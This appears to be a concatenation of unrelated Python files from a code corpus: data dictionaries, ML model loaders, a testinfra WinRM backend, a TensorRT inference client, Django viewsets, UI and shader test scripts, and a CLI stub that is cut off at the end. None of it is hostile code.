    '4': 'Trần Hưng Đạo',
    '5': 'Lê Thánh Tôn',
    '6': 'Nguyễn Hữu Cảnh',
    '7': 'Lý Tự Trọng',
    '8': 'Nguyễn Du',
    '9': 'Cô Bắc',
    '10': 'Cô Giang',
}

# Kind of real estate being listed.
realestate_type = {
    '1': 'Land',
    '2': 'House',
    '3': 'Apartment/Penhouse',  # NOTE(review): looks like a typo for 'Penthouse' -- kept verbatim; downstream code may match on it
    '4': 'Project',
    '5': 'Factory',
    '6': 'Others',
    '7': 'Motel',
    '8': 'Flat',
}

# How the property is offered.
transaction_type = {
    '1': 'Sell',
    '2': 'Rent',
    '3': 'Transfer',
    '4': 'Sell or Rent',
    '5': 'Sell or Rent (Rent Price Available)',
    '6': 'Sell or Rent (Rent Price Not Available)',
    '7': 'Other',
}

# Position of the property relative to the street.
position_street = {
    '1': 'Frontispiece',
    '2': 'Cornor Of Frontispiece',  # NOTE(review): 'Cornor' looks like a typo for 'Corner' -- kept verbatim
    '3': 'Wide Alley',
    '4': 'Narrow Alley',
    '5': 'Two Front Alley',
    '6': 'Other',
}

# Ownership-paper (legal) status of the listing.
legal = {
    '1': 'Undefined',
    '2': 'Ownership certificate Not Available',
    '3': 'Ownership certificate Available',
}
import random
import pandas
import numpy as np
from sklearn import metrics, cross_validation
import tensorflow as tf
from tensorflow.contrib import layers
from tensorflow.contrib import learn

# Deterministic runs for the demo below.
random.seed(42)
# Original Titanic-dataset loading code, kept disabled as reference.
"""
data = pandas.read_csv('titanic_train.csv')
X = data[["Embarked"]]
y = data["Survived"]
X_train, X_test, y_train, y_test = cross_validation.train_test_split(X, y, test_size=0.2, random_state=42)
embarked_classes = X_train["Embarked"].unique()
n_classes = len(embarked_classes) + 1
print('Embarked has next classes: ', embarked_classes)
"""
# Minimal demo of tf.contrib.learn's CategoricalProcessor: map string
# categories to integer ids, then reverse one id back to its string.
# NOTE(review): sklearn.cross_validation and tensorflow.contrib were removed
# in later releases; this script requires old sklearn (<0.20) and TF 1.x.
X_train = ["s", "a", "s", "d"]
cat_processor = learn.preprocessing.CategoricalProcessor()
# fit_transform yields one id-sequence per example; materialize as ndarray.
X_train = np.array(list(cat_processor.fit_transform(X_train)))
t = X_train[0][0]
# reverse() maps the integer id back to the original category string.
result = cat_processor.vocabularies_[0].reverse(t)
| StarcoderdataPython |
8188108 | <reponame>Wsine/filterfuzz
import os
import torch
def load_model(opt):
    """Build and return the model selected by *opt*.

    If ``opt.dataset`` contains 'cifar' (e.g. 'cifar10'), a pretrained model
    named ``{dataset}_{model}`` is pulled from torch.hub.  Otherwise
    ``opt.model`` must be 'convstn' (GTSRB), loaded from a local checkpoint.

    Raises:
        ValueError: for any other dataset/model combination.
    """
    if 'cifar' in opt.dataset:
        # e.g. dataset='cifar10', model='resnet20' -> hub model 'cifar10_resnet20'
        model_hub = 'chenyaofo/pytorch-cifar-models'
        model_name = f'{opt.dataset}_{opt.model}'
        return torch.hub.load(model_hub, model_name, pretrained=True)
    if opt.model == 'convstn':
        # Local import: the GTSRB package is only needed on this path.
        from models.gtsrb.convstn import Net
        model = Net()
        # Checkpoint is always mapped to CPU; move to GPU at the call site.
        checkpoint = torch.load(
            os.path.join('models', 'gtsrb', 'model_40.pth'),
            map_location=torch.device('cpu')
        )
        model.load_state_dict(checkpoint)
        return model
    # Fix: the original message blamed only the dataset, but this branch is
    # reached whenever the model/dataset pairing is unsupported.
    raise ValueError(
        f'Invalid dataset/model combination: {opt.dataset}/{opt.model}')
| StarcoderdataPython |
8183995 | from testinfra.backend import base
from ConfigParser import SafeConfigParser
from winrm.protocol import Protocol
from winrm import Session
import base64
class WinrmBackend(base.BaseBackend):
    """testinfra backend that runs commands on Windows hosts over WinRM."""

    NAME = "winrm"

    def __init__(self, name, winrm_config=None, *args, **kwargs):
        # parse_containerspec (from BaseBackend) splits a "user@host" spec.
        self.name, self.user = self.parse_containerspec(name)
        self.winrm_config = winrm_config
        self._client = None
        super(WinrmBackend, self).__init__(self.name, *args, **kwargs)

    @property
    def client(self):
        """Lazily built pywinrm Protocol, configured from the ini file."""
        if self._client is not None:
            return self._client
        cfg = SafeConfigParser()
        cfg.read(self.winrm_config)
        transport = cfg.get('winrm', 'transport')
        # When secure_transport is requested, the URL scheme switches to ssl;
        # the Protocol-level transport stays as configured.
        use_ssl = cfg.get('winrm', 'secure_transport') == "true"
        endpoint = Session._build_url(
            self.hostname, 'ssl' if use_ssl else transport)
        self._client = Protocol(
            endpoint=endpoint,
            username=cfg.get('winrm', 'username'),
            password=cfg.get('winrm', 'password'),
            transport=transport,
            server_cert_validation='ignore')
        return self._client

    def run(self, command, *args, **kwargs):
        """Execute *command* via an encoded powershell invocation and return
        a testinfra result (rc, command, stdout, stderr)."""
        shell_id = self.client.open_shell()
        # powershell -encodedcommand expects base64 of UTF-16LE source.
        payload = base64.b64encode(command.encode("utf_16_le"))
        command_id = self._client.run_command(
            shell_id, "powershell -encodedcommand %s" % payload)
        stdout, stderr, rc = self._client.get_command_output(shell_id, command_id)
        self._client.cleanup_command(shell_id, command_id)
        self._client.close_shell(shell_id)
        return self.result(rc, self.encode(command), stdout, stderr)
| StarcoderdataPython |
1818235 | <reponame>ccpn1988/TIR<gh_stars>1-10
# ACCOUNTS RECEIVABLE WRITE-OFF ("baixas a receber") -- TIR UI test for
# Protheus routine FINA070.
import unittest
from tir import Webapp
from datetime import datetime

# Today's date in the dd/mm/yyyy format Protheus expects.
DateSystem = datetime.today().strftime('%d/%m/%Y')


class FINA070(unittest.TestCase):
    """UI test: receive (write off) title FIN002152 through routine FINA070."""

    @classmethod
    def setUpClass(inst):
        # Open the browser and log into module 06 on branch 'D MG 01'.
        inst.oHelper = Webapp()
        inst.oHelper.Setup("SIGAFIN", DateSystem, "T1", "D MG 01 ", "06")
        inst.oHelper.Program("FINA070")

    def test_FINA070_CT193(self):
        """CT193: the fine parameters are honored when receiving a title."""
        # Browse key pieces: prefix + title number + installment + type.
        prefixo = "FIN"
        titulo = "FIN002152"
        parcela = "  "
        tipo = "NF "
        banco = "001"
        agencia = "001"
        conta = "001"
        data = "21/06/2019"
        # Force the parameter values this test case depends on (interest
        # type, fine percentage, etc.) before interacting with the routine.
        self.oHelper.AddParameter("MV_BR10925", "", "2", "2", "2")
        self.oHelper.AddParameter("MV_JURTIPO", "", "L", "L", "L")
        self.oHelper.AddParameter("MV_FINJRTP", "", "2", "2", "2")
        self.oHelper.AddParameter("MV_LJMULTA", "", "0.10", "0.10", "0.10")
        self.oHelper.SetParameters()
        self.oHelper.SearchBrowse(f"D MG 01 {prefixo}{titulo}{parcela}{tipo}")
        # First pass: receive on the due date -> no fine expected.
        self.oHelper.SetButton("Baixar")
        self.oHelper.WaitShow("Baixa de Titulos - BAIXAR")
        self.oHelper.SetValue("Data Receb.", data)
        self.oHelper.SetValue("Data Crédito", data)
        self.oHelper.CheckResult("+ Multa", "0,00")
        self.oHelper.CheckResult("= Valor Recebido", "10000,00")
        self.oHelper.SetButton("Cancelar")
        # Second pass: receive one week late -> the 10,00 fine is applied.
        self.oHelper.SetButton("Baixar")
        self.oHelper.WaitShow("Baixa de Titulos - BAIXAR")
        data = "28/06/2019"
        self.oHelper.SetValue("Mot.Baixa", "NORMAL")
        self.oHelper.SetValue("Banco", banco)
        self.oHelper.SetValue("Agência", agencia)
        self.oHelper.SetValue("Conta", conta)
        self.oHelper.SetValue("Data Receb.", data)
        self.oHelper.SetValue("Data Crédito", data)
        self.oHelper.CheckResult("+ Multa", "10,00")
        self.oHelper.CheckResult("= Valor Recebido", "10010,00")
        self.oHelper.SetButton("Salvar")
        # Evaluate all CheckResult verdicts accumulated above.
        self.oHelper.AssertTrue()

    @classmethod
    def tearDownClass(inst):
        inst.oHelper.TearDown()


if __name__ == "__main__":
    unittest.main()
def solve(lines):
    """Apply the submarine commands (Advent of Code 2021, day 2, part 2).

    Each line is '<command> <amount>' with command in {forward, down, up}.
    'down'/'up' adjust the aim; 'forward' advances horizontally and dives
    by amount * aim.

    Returns (horizontal, depth, horizontal * depth).
    """
    horizontal = 0
    depth = 0
    aim = 0
    for line in lines:
        command, num = line.split()
        num = int(num)
        if command == "forward":
            horizontal += num
            depth += num * aim
        elif command == "down":
            aim += num
        elif command == "up":
            aim -= num
    return horizontal, depth, horizontal * depth


def main():
    """Read the puzzle input and print the answer triple."""
    # 'with' closes the file even on error; the original leaked the handle
    # and named it 'input', shadowing the builtin.
    with open('input.txt', 'r') as infile:
        horizontal, depth, product = solve(infile)
    print(horizontal, depth, product)


if __name__ == "__main__":
    main()
| StarcoderdataPython |
199009 | #!/usr/bin/python
# Copyright (c) 2018, NVIDIA CORPORATION. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of NVIDIA CORPORATION nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS ``AS IS'' AND ANY
# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY
# OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import argparse
import time
import numpy as np
import pandas as pd
import os
from builtins import range
from PIL import Image
import grpc
# Drop "from src.core import" because the import hierarchy in proto files
# will be removed in Makefile.clients
from tensorrtserver.api import api_pb2
from tensorrtserver.api import grpc_service_pb2
from tensorrtserver.api import grpc_service_pb2_grpc
from tensorrtserver.api import model_config_pb2
from tensorrtserver.api import request_status_pb2
from tensorrtserver.api import server_status_pb2
# Parsed argparse namespace; populated in __main__ and left module-level so
# it is visible to the rest of this script.
FLAGS = None
def _log(*args, **kwargs):
print("[Client]", *args, **kwargs)
def model_dtype_to_np(model_dtype):
    """Map a model_config_pb2 DataType enum value to a numpy scalar type.

    Returns None for unsupported/unknown values (e.g. TYPE_STRING), which
    callers must handle.
    """
    # Fix: np.bool_ replaces np.bool, which was deprecated in numpy 1.20 and
    # removed in numpy >= 1.24.
    mapping = {
        model_config_pb2.TYPE_BOOL: np.bool_,
        model_config_pb2.TYPE_INT8: np.int8,
        model_config_pb2.TYPE_INT16: np.int16,
        model_config_pb2.TYPE_INT32: np.int32,
        model_config_pb2.TYPE_INT64: np.int64,
        model_config_pb2.TYPE_UINT8: np.uint8,
        model_config_pb2.TYPE_UINT16: np.uint16,
        model_config_pb2.TYPE_FP16: np.float16,
        model_config_pb2.TYPE_FP32: np.float32,
        model_config_pb2.TYPE_FP64: np.float64,
    }
    return mapping.get(model_dtype)
def parse_model(status, model_name, batch_size, verbose=False):
    """
    Check the configuration of a model to make sure it meets the
    requirements for an image classification network (as expected by
    this client).

    Returns (input_name, output_name, c, h, w, input_format, np_dtype,
    output_byte_size).  Raises Exception when the model does not match.
    """
    server_status = status.server_status
    if model_name not in server_status.model_status.keys():
        raise Exception("unable to get status for '" + model_name + "'")

    status = server_status.model_status[model_name]
    config = status.config

    # Fix: the original concatenated ints onto str here (and below), which
    # raised TypeError instead of the intended error message.
    if len(config.input) != 1:
        raise Exception("expecting 1 input, got " + str(len(config.input)))
    if len(config.output) != 1:
        raise Exception("expecting 1 output, got " + str(len(config.output)))

    model_input = config.input[0]  # renamed from 'input' (shadowed builtin)
    output = config.output[0]

    if output.data_type != model_config_pb2.TYPE_FP32:
        raise Exception("expecting output datatype to be TYPE_FP32, model '" +
                        model_name + "' output type is " +
                        model_config_pb2.DataType.Name(output.data_type))

    # Output is expected to be a vector. But allow any number of
    # dimensions as long as all but 1 is size 1 (e.g. { 10 }, { 1, 10
    # }, { 10, 1, 1 } are all ok).
    non_one_cnt = 0
    for dim in output.dims:
        if dim > 1:
            non_one_cnt += 1
    if non_one_cnt > 1:
        raise Exception("expecting model output to be a vector")

    # Model specifying maximum batch size of 0 indicates that batching
    # is not supported and so the input tensors do not expect an "N"
    # dimension (and 'batch_size' should be 1 so that only a single
    # image instance is inferred at a time).
    max_batch_size = config.max_batch_size
    if max_batch_size == 0:
        if batch_size != 1:
            raise Exception("batching not supported for model '" + model_name + "'")
    else:  # max_batch_size > 0
        if batch_size > max_batch_size:
            # Fix: max_batch_size is an int; str() it before concatenating.
            raise Exception("expecting batch size <= " + str(max_batch_size) +
                            " for model '" + model_name + "'")

    # Model input must have 3 dims, either CHW or HWC.
    if len(model_input.dims) != 3:
        # Fix: original used C++-style '<<' here, which raised TypeError.
        raise Exception("expecting input to have 3 dimensions, model '" +
                        model_name + "' input has " + str(len(model_input.dims)))

    if ((model_input.format != model_config_pb2.ModelInput.FORMAT_NCHW) and
            (model_input.format != model_config_pb2.ModelInput.FORMAT_NHWC)):
        raise Exception(
            "unexpected input format " +
            model_config_pb2.ModelInput.Format.Name(model_input.format) +
            ", expecting " +
            model_config_pb2.ModelInput.Format.Name(model_config_pb2.ModelInput.FORMAT_NCHW) +
            " or " +
            model_config_pb2.ModelInput.Format.Name(model_config_pb2.ModelInput.FORMAT_NHWC))

    if model_input.format == model_config_pb2.ModelInput.FORMAT_NHWC:
        h = model_input.dims[0]
        w = model_input.dims[1]
        c = model_input.dims[2]
    else:
        c = model_input.dims[0]
        h = model_input.dims[1]
        w = model_input.dims[2]

    # Byte size of one output vector: product of dims * element size.
    output_size = 1
    for dim in output.dims:
        output_size = output_size * dim
    output_size = output_size * np.dtype(model_dtype_to_np(output.data_type)).itemsize

    return (model_input.name, output.name, c, h, w, model_input.format,
            model_dtype_to_np(model_input.data_type), output_size)
def preprocess(img, format, dtype, c, h, w, scaling):
    """
    Pre-process an image to meet the size, type and format
    requirements specified by the parameters.
    """
    # Grayscale for single-channel models, RGB otherwise.
    mode = 'L' if c == 1 else 'RGB'
    arr = np.array(img.convert(mode).resize((h, w), Image.BILINEAR))
    # Grayscale arrays come back 2-D; add a trailing channel axis.
    if arr.ndim == 2:
        arr = arr[:, :, np.newaxis]
    arr = arr.astype(dtype)

    # Pixel scaling: INCEPTION maps into [-1, 1); VGG subtracts channel
    # means; anything else leaves raw pixel values untouched.
    if scaling == 'INCEPTION':
        arr = (arr / 128) - 1
    elif scaling == 'VGG':
        means = (128,) if c == 1 else (123, 117, 104)
        arr = arr - np.asarray(means, dtype=dtype)

    # Channels are in RGB order. Currently model configuration data
    # doesn't provide any information as to other channel orderings
    # (like BGR) so we just assume RGB.
    if format == model_config_pb2.ModelInput.FORMAT_NCHW:
        arr = np.transpose(arr, (2, 0, 1))
    return arr
def postprocess(results, files, idx, batch_size, num_classes, verbose=False):
    """
    Post-process results to show classifications.

    results: expected to contain exactly one inference output entry.
    files: filenames of this batch's images (used only for labeling).
    idx: 0-based batch index, used only for display.
    Raises Exception if the result count or batch size is inconsistent.
    """
    # Per-image details are printed when verbose, or for a single-image
    # batch where more than one class was requested.
    show_all = verbose or ((batch_size == 1) and (num_classes > 1))
    if show_all:
        if idx == 0:
            print("Output probabilities:")
        print("batch {}:".format(idx))

    if len(results) != 1:
        raise Exception("expected 1 result, got " + str(len(results)))

    batched_result = results[0].batch_classes
    if len(batched_result) != batch_size:
        raise Exception("expected " + str(batch_size) +
                        " results, got " + str(len(batched_result)))

    # For each result in the batch count the top prediction. Since we
    # used the same image for every entry in the batch we expect the
    # top prediction to be the same for each entry... but this code
    # doesn't assume that.
    counts = dict()
    predictions = dict()
    for (index, result) in enumerate(batched_result):
        label = result.cls[0].label
        if label not in counts:
            counts[label] = 0
        counts[label] += 1
        predictions[label] = result.cls[0]

        # If requested, print all the class results for the entry
        if show_all:
            # Padded batches repeat the last image; clamp the index so the
            # printed name refers to a real file.
            if (index >= len(files)):
                index = len(files) - 1
            # Top 1, print compactly
            if len(result.cls) == 1:
                print("Image '{}': {} ({}) = {}".format(
                    files[index], result.cls[0].idx,
                    result.cls[0].label, result.cls[0].value))
            else:
                print("Image '{}':".format(files[index]))
                for cls in result.cls:
                    print("    {} ({}) = {}".format(cls.idx, cls.label, cls.value))

    # Summary
    print("Prediction totals:")
    for (label, cnt) in counts.items():
        cls = predictions[label]
        print("\tcnt={}\t({}) {}".format(cnt, cls.idx, cls.label))
if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument('-v', '--verbose', action="store_true", required=False, default=False,
                        help='Enable verbose output')
    parser.add_argument('-m', '--model-name', type=str, required=True,
                        help='Name of model')
    parser.add_argument('-x', '--model-version', type=str, required=False,
                        help='Version of model. Default is to use latest version.')
    parser.add_argument('-b', '--batch-size', type=int, required=False, default=1,
                        help='Batch size. Default is 1.')
    parser.add_argument('-c', '--classes', type=int, required=False, default=1,
                        help='Number of class results to report. Default is 1.')
    parser.add_argument('-s', '--scaling', type=str, choices=['NONE', 'INCEPTION', 'VGG'],
                        required=False, default='NONE',
                        help='Type of scaling to apply to image pixels. Default is NONE.')
    parser.add_argument('-u', '--url', type=str, required=False, default='localhost:8001',
                        help='Inference server URL. Default is localhost:8001.')
    parser.add_argument('-p', '--preprocessed', type=str, required=False,
                        metavar='FILE', help='Write preprocessed image to specified file.')
    parser.add_argument('--result-name', type=str, required=False,
                        help='Path to parquet file')
    parser.add_argument('image_filename', type=str, nargs='?', default=None,
                        help='Input image.')
    FLAGS = parser.parse_args()

    # Create gRPC stub for communicating with the server
    channel = grpc.insecure_channel(FLAGS.url)
    grpc_stub = grpc_service_pb2_grpc.GRPCServiceStub(channel)

    # Prepare request for Status gRPC
    request = grpc_service_pb2.StatusRequest(model_name=FLAGS.model_name)
    # Call and receive response from Status gRPC
    response = grpc_stub.Status(request)

    # Make sure the model matches our requirements, and get some
    # properties of the model that we need for preprocessing
    input_name, output_name, c, h, w, format, dtype, output_size = parse_model(
        response, FLAGS.model_name, FLAGS.batch_size, FLAGS.verbose)

    # Prepare request for Infer gRPC
    # The meta data part can be reused across requests
    request = grpc_service_pb2.InferRequest()
    request.model_name = FLAGS.model_name
    if FLAGS.model_version is None:
        FLAGS.model_version = ""  # using lastest version
    request.version = FLAGS.model_version
    request.meta_data.batch_size = FLAGS.batch_size
    output_message = api_pb2.InferRequestHeader.Output()
    output_message.name = output_name
    output_message.byte_size = output_size
    output_message.cls.count = FLAGS.classes
    request.meta_data.output.extend([output_message])

    multiple_inputs = False
    batched_filenames = []
    responses = []
    if os.path.isdir(FLAGS.image_filename):
        # Directory mode: batch all files and fire async Infer requests.
        files = [f for f in os.listdir(FLAGS.image_filename)
                 if os.path.isfile(os.path.join(FLAGS.image_filename, f))]
        multiple_inputs = (len(files) > 1)
        input_bytes = None
        requests = []
        filenames = []
        # Place every 'batch_size' number of images into one request
        # and send it via AsyncRun() API. If the last request doesn't have
        # 'batch_size' input tensors, pad it with the last input tensor.
        cnt = 0
        for idx in range(len(files)):
            filenames.append(files[idx])
            img = Image.open(os.path.join(FLAGS.image_filename, files[idx]))
            input_tensor = preprocess(img, format, dtype, c, h, w, FLAGS.scaling)
            # This field can not be set until input tensor is obtained
            if len(request.meta_data.input) == 0:
                request.meta_data.input.add(
                    name=input_name, byte_size=input_tensor.size * input_tensor.itemsize)
            if input_bytes is None:
                input_bytes = input_tensor.tobytes()
            else:
                input_bytes += input_tensor.tobytes()
            cnt += 1
            if (idx + 1 == len(files)):
                # Pad the final, partial batch by repeating the last tensor.
                while (cnt != FLAGS.batch_size):
                    input_bytes += input_tensor.tobytes()
                    cnt += 1
            # Send the request and reset input_tensors
            if cnt >= FLAGS.batch_size:
                del request.raw_input[:]
                request.raw_input.extend([input_bytes])
                # Call and receive future response from async Infer gRPC
                requests.append(grpc_stub.Infer.future(request))
                input_bytes = None
                cnt = 0
                batched_filenames.append(filenames)
                filenames = []
        # Get results by send order
        for request in requests:
            responses.append(request.result())
    else:
        # Single-file mode: build one request (replicated batch_size times),
        # then re-send it 2000x to measure round-trip latency.
        batched_filenames.append([FLAGS.image_filename])
        # Load and preprocess the image
        img = Image.open(FLAGS.image_filename)
        input_tensor = preprocess(img, format, dtype, c, h, w, FLAGS.scaling)
        request.meta_data.input.add(
            name=input_name, byte_size=input_tensor.size * input_tensor.itemsize)
        if FLAGS.preprocessed is not None:
            # NOTE(review): 'preprocessed' is undefined here (NameError) --
            # presumably FLAGS.preprocessed was intended, and tobytes()
            # requires the file opened in binary mode ("wb"). Confirm and fix.
            with open(preprocessed, "w") as file:
                file.write(input_tensor.tobytes())
        # Need 'batch_size' copies of the input tensor...
        input_bytes = input_tensor.tobytes()
        for b in range(FLAGS.batch_size-1):
            input_bytes += input_tensor.tobytes()
        request.raw_input.extend([input_bytes])
        # Call and receive response from Infer gRPC
        durations = []
        for _ in range(2000):
            start = time.perf_counter()
            responses.append(grpc_stub.Infer(request))
            end = time.perf_counter()
            duration_ms = (end - start) * 1000
            durations.append(duration_ms)
        responses.append(grpc_stub.Infer(request))
        # print(responses[0].request_status)
        # Save Data
        # NOTE(review): output path is hard-coded to '10.pq'; the
        # --result-name flag is parsed but never used -- confirm intent.
        df = pd.DataFrame({"duration_ms": durations})
        df.to_parquet('10.pq')
        mean, p99 = df["duration_ms"].mean(), np.percentile(durations, 99)
        _log(f"Mean Latency: {mean}, P99: {p99}")

    # TODO: Update postprocess
    #for idx in range(len(responses)):
    #    postprocess(responses[idx].meta_data.output, batched_filenames[idx],
    #                idx, FLAGS.batch_size, FLAGS.classes,
    #                FLAGS.verbose or multiple_inputs)
| StarcoderdataPython |
11236820 | <reponame>sircodesalittle/MOOC-TIme
from django.shortcuts import render
from django.contrib.auth.models import User, Group
from rest_framework import viewsets
from .models import Course, Work, IntervalSession
from api.serializers import UserSerializer, \
GroupSerializer, \
CourseSerializer, \
WorkSerializer, \
IntervalSessionSerializer
from django.http import JsonResponse, FileResponse
def get_possible_work_events(request, id):
    """Return the possible work events of course *id* as a JSON response.

    `id` is bound by the URL pattern; raises Course.DoesNotExist (-> 500)
    when no such course exists, matching the original behavior.
    """
    # Fix: removed a leftover debug print(id).
    target_course = Course.objects.get(id=id)
    # safe=False because get_possible_events() yields a list, not a dict.
    return JsonResponse(target_course.get_possible_events(), safe=False)
def get_calendar(request):
    """Serve the matching course's iCalendar file as a download.

    Expects a `course_id` query parameter; when it is absent the view
    returns None (Django then reports an error), as before.
    """
    # Fix: request.GET['course_id'] raised MultiValueDictKeyError when the
    # parameter was missing, so the None check below could never run;
    # .get() makes that guard reachable. Also removed a debug print.
    course_id = request.GET.get('course_id')
    if course_id is not None:
        course = Course.objects.all().filter(id=course_id)
        response = FileResponse(open(course[0].get_calendar(), 'rb'))
        response['Content-Disposition'] = 'attachment; filename="MOOCCalendar.ics"'
        return response
class UserViewSet(viewsets.ModelViewSet):
    """
    API endpoint that allows users to be viewed or edited.
    """
    # Newest accounts first.
    queryset = User.objects.all().order_by('-date_joined')
    serializer_class = UserSerializer
class GroupViewSet(viewsets.ModelViewSet):
    """
    API endpoint that allows groups to be viewed or edited.
    """
    queryset = Group.objects.all()
    serializer_class = GroupSerializer
class CourseViewSet(viewsets.ModelViewSet):
    """CRUD API endpoint for courses."""
    queryset = Course.objects.all()
    serializer_class = CourseSerializer
class WorkViewSet(viewsets.ModelViewSet):
    """CRUD API endpoint for Work items, ordered by due date and optionally
    narrowed by the `course_id` query parameter."""
    serializer_class = WorkSerializer

    def get_queryset(self):
        """All work by due date, or just one course's when course_id is given."""
        work = Work.objects.all().order_by('due_date')
        course_id = self.request.query_params.get('course_id', None)
        if course_id is None:
            return work
        return work.filter(course__id=course_id)
class IntervalSessionViewSet(viewsets.ModelViewSet):
    """CRUD API endpoint for interval (study) sessions."""
    queryset = IntervalSession.objects.all()
    serializer_class = IntervalSessionSerializer
| StarcoderdataPython |
5038717 | <reponame>daxreyes/fastapi-svelte-experiments
from .msg import Msg
from .token import Token, TokenPayload
from .user import User, UserCreate, UserInDB, UserUpdate
from .item import (
Item,
ItemCreate,
ItemInDB,
ItemUpdate,
ItemOut,
)
| StarcoderdataPython |
5060911 | #!/usr/bin/env python3
import json
import os
import sys
import random
from pathlib import Path
def main(num_objects, output_path):
    """Write *num_objects* randomly generated product records to *output_path*
    as one JSON array.

    :param num_objects: number of json objects to create in the output file
    :param output_path: the path to the output file
    """
    num_objects = int(num_objects)
    products = []
    for index in range(num_objects):
        # Each product: sequential id, a random cost, and 0-100 random
        # cost components.
        products.append({
            'id': index,
            'cost': random.uniform(0, 100.0),
            'cost_components': [random.uniform(0, 52.5)
                                for _ in range(random.randint(0, 100))],
        })
    # Serialize once as a single JSON array. This replaces the original
    # hand-written '[' / ',' / ']' bookkeeping (which cannot be malformed
    # this way) and drops the redundant close() inside the 'with' block.
    with open(output_path, 'w') as outfile:
        json.dump(products, outfile)
if __name__ == "__main__":
    # Expect exactly two CLI arguments: the object count and the output path.
    if len(sys.argv) == 3:
        main(*sys.argv[1:])
    else:
        print("Usage: python3 create-json-objects.py #num_objects #output_path")
# Example: Hangup call
# Terminates the in-progress call identified by 'callId'. `api` must be an
# already-initialized client instance; it is not created in this snippet.
api.hangup_call('callId')
| StarcoderdataPython |
#!/usr/bin/env python

# Copyright Contributors to the Open Shading Language project.
# SPDX-License-Identifier: BSD-3-Clause
# https://github.com/AcademySoftwareFoundation/OpenShadingLanguage

# OSL testsuite driver fragment: `command`, `testshade`, `outputs`,
# `failthresh` and `failpercent` are conventions of the testsuite runner,
# which execs this file with `command` already defined. Each testshade()
# call renders one shader variant to a tif compared against references.
# Variant names encode uniform (u_) vs varying (v_) and derivative (d) args.

# max(float,float) includes masking
command += testshade("-t 1 -g 64 64 -od uint8 -o Cout out_max_u_float_u_float.tif test_max_u_float_u_float")
command += testshade("-t 1 -g 64 64 -od uint8 -o Cout out_max_u_float_v_float.tif test_max_u_float_v_float")
command += testshade("-t 1 -g 64 64 -od uint8 -o Cout out_max_v_float_u_float.tif test_max_v_float_u_float")
command += testshade("-t 1 -g 64 64 -od uint8 -o Cout out_max_v_float_v_float.tif test_max_v_float_v_float")
# Derivs includes masking
# NOTE(review): '--vary_udxdy' is passed twice here and below -- possibly one
# occurrence should be '--vary_vdxdy'; confirm against sibling test scripts.
command += testshade("--vary_udxdy --vary_udxdy -t 1 -g 64 64 -od uint8 -o Cout out_max_v_dfloat_v_dfloat.tif test_max_v_dfloat_v_dfloat")
# max(int, int) (includes masking)
command += testshade("-t 1 -g 64 64 -od uint8 -o Cout out_max_u_int_u_int.tif test_max_u_int_u_int")
command += testshade("-t 1 -g 64 64 -od uint8 -o Cout out_max_u_int_v_int.tif test_max_u_int_v_int")
command += testshade("-t 1 -g 64 64 -od uint8 -o Cout out_max_v_int_u_int.tif test_max_v_int_u_int")
command += testshade("-t 1 -g 64 64 -od uint8 -o Cout out_max_v_int_v_int.tif test_max_v_int_v_int")
# max(vec, vec) (including Masking)
command += testshade("-t 1 -g 64 64 -od uint8 -o Cout out_max_u_vec_u_vec.tif test_max_u_vec_u_vec")
command += testshade("-t 1 -g 64 64 -od uint8 -o Cout out_max_u_vec_v_vec.tif test_max_u_vec_v_vec")
command += testshade("-t 1 -g 64 64 -od uint8 -o Cout out_max_v_vec_v_vec.tif test_max_v_vec_v_vec")
command += testshade("-t 1 -g 64 64 -od uint8 -o Cout out_max_v_vec_u_vec.tif test_max_v_vec_u_vec")
# Derivs includes masking
command += testshade("--vary_udxdy --vary_udxdy -t 1 -g 64 64 -od uint8 -o Cout out_max_v_dvec_v_dvec.tif test_max_v_dvec_v_dvec")

# Images the runner diffs against the reference directory.
outputs = [
    "out_max_u_float_u_float.tif",
    "out_max_u_float_v_float.tif",
    "out_max_v_float_u_float.tif",
    "out_max_v_float_v_float.tif",
    "out_max_v_dfloat_v_dfloat.tif",
    "out_max_u_int_u_int.tif",
    "out_max_u_int_v_int.tif",
    "out_max_v_int_u_int.tif",
    "out_max_v_int_v_int.tif",
    "out_max_u_vec_u_vec.tif",
    "out_max_u_vec_v_vec.tif",
    "out_max_v_vec_v_vec.tif",
    "out_max_v_vec_u_vec.tif",
    "out_max_v_dvec_v_dvec.tif"
]

# expect a few LSB failures
failthresh = 0.008
failpercent = 3
| StarcoderdataPython |
48761 | <gh_stars>1-10
from typing import List
import typer
from tgcli.commands.etc.help_text import GRAPH_ARG_HELP, CONFIG_ARG_HELP
from tgcli.commands.util import get_initialized_tg_connection, resolve_multiple_args, preprocess_list_query
from tgcli.util import cli
# Typer sub-application grouping all `get ...` commands; mounted by the main CLI.
get_app = typer.Typer(help="Get resources from your TigerGraph server.")
@get_app.command("vertices")
def get_vertices(
    # Basic config
    config_name: str = typer.Argument(None, help=CONFIG_ARG_HELP),
    graph_name: str = typer.Argument(None, help=GRAPH_ARG_HELP),
    # Required items
    vertex_type: str = typer.Option(..., "--type", help="Type of the vertex."),
    # Query by ID's. If given, ID's take precedence over the generic query
    vertex_ids: List[str] = typer.Option(
        [], "--id",
        help="ID of the vertex to retrieve, multiple can be specified by using the flag multiple times. If "
             "this is specified, other query parameters are ignored."
    ),
